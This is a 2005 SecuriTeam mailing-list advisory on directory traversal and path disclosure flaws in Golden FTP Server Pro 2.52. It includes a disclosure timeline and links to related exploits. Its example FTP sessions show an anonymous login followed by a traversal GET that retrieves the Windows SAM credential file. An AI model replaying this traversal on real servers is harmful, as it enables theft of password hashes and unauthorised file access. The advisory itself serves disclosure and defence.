From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 8 May 2005 16:14:23 +0200
Subject: [NT] Golden FTP Server Pro Directory Traversal and Path Disclosure
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20050508132738.2C2C157E4@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Golden FTP Server Pro Directory Traversal and Path Disclosure
------------------------------------------------------------------------
SUMMARY
" <http://www.goldenftpserver.com/>; Golden FTP Server is extremely easy to
use personal FTP server for Windows and can be run by any person who has
the most basic computer skills."
A vulnerability in Golden FTP Server makes it possible to break out of
bounding FTP root directory via a directory traversal sequence, and access
files stored there. Another vulnerability makes it possible to disclose
the true path under which a files are stored by requesting a non-existent
file.
DETAILS
Vulnerable Systems:
* Golden FTP Server Pro version 2.52 (other versions suspected)
Directory Traversal:
The Golden FTP server sets a default FTP root directory, for example:
c:\Temp is set as the FTP root directory and is mapped to \Temp. The
directory traversal vulnerability will only manifest itself if you first
change to the name of the directory, i.e. Temp.
Example:
The following traffic sequences illustrate the vulnerability:
C:\>ftp ********
Connected to **********
220 Golden FTP Server PRO ready v2.52
User (********:(none)): anonymous
331 User name okay, need password.
Password:
230 User logged in, proceed.
ftp> cd Temp
250 CWD Command successful.
ftp> GET "\../winnt/repair/sam
200 PORT Command successful.
150 File status okay; about to open data connection.
226 Closing data connection.
ftp: 24576 bytes received in 1.10Seconds
22.32Kbytes/sec.
ftp> !dir sam
Volume in drive C has no label.
Volume Serial Number is F4A5-2272
Directory of C:\
26/04/2005 11:30 AM 24,576 Sam
1 File(s) 24,576 bytes
0 Dir(s) 30,103,302,656 bytes free
Path Disclosure:
In addition to the above vulnerability another vulnerability which
utilizes the same issue, i.e. changing your current directory to the name
of the FTP root directory, can be used to disclosue the true path under
which the user is currently residing.
Example:
The following illustrates the problem:
ftp>
C:\>ftp ****
Connected to ****
220 Golden FTP Server PRO ready v2.52
User (******:(none)): anonymous
331 User name okay, need password.
Password:
230 User logged in, proceed.
ftp> cd Temp
250 CWD Command successful.
ftp> get C:\blah
200 PORT Command successful.
550 Cannot open file C:\Temp\C:\blah
Disclosure Timeline:
* 02.05.05 - Date vendor notified.
* 03.05.05 - Public Disclosure.
Other vulnerabilities in Golden FTP Server:
<http://www.securiteam.com/windowsntfocus/5AP0L1FEKG.html>; Multiple
Buffer Overflows in Golden FTP Server
<http://www.securiteam.com/windowsntfocus/5SP010UF5W.html>; Buffer
Overflow In Golden FTP ( Long Username)
<http://www.securiteam.com/exploits/5ZP000AFQI.html>; Golden FTP Server
Pro Buffer Overflow (USER, Exploit)
<http://www.securiteam.com/exploits/5AP010AFQG.html>; Golden FTP Server
Remote Buffer Overflow (USER, Exploit, 2nd Version)
<http://www.securiteam.com/windowsntfocus/5CP030AFQU.html>; Buffer
Overflow in Golden FTP Server (USER, Exploit, Perl)
ADDITIONAL INFORMATION
The information has been provided by <mailto:pseudonym_ok@yahoo.com.>
Lachlan. H.
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
